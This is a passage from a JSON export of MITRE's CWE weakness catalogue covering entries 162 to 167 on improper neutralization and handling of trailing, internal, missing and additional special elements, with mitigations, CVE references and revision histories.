Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Leading Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Leading Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"162":{"attr":{"@_ID":"162","@_Name":"Improper Neutralization of Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"635"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Trailing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Trailing Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"163":{"attr":{"@_ID":"163","@_Name":"Improper Neutralization of Multiple Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Trailing Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Trailing Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"164":{"attr":{"@_ID":"164","@_Name":"Improper Neutralization of Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Internal Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Internal Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"165":{"attr":{"@_ID":"165","@_Name":"Improper Neutralization of Multiple Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Internal Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Internal Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"166":{"attr":{"@_ID":"166","@_Name":"Improper Handling of Missing Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be removed in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1362","Description":"Crash via message type without separator character","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1362"},{"Reference":"CVE-2002-0729","Description":"Missing special character (separator) causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729"},{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Missing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Special Element","attr":{"@_Date":"2009-05-27"}}]}},"167":{"attr":{"@_ID":"167","@_Name":"Improper Handling of Additional Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that extra special elements will be injected in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query 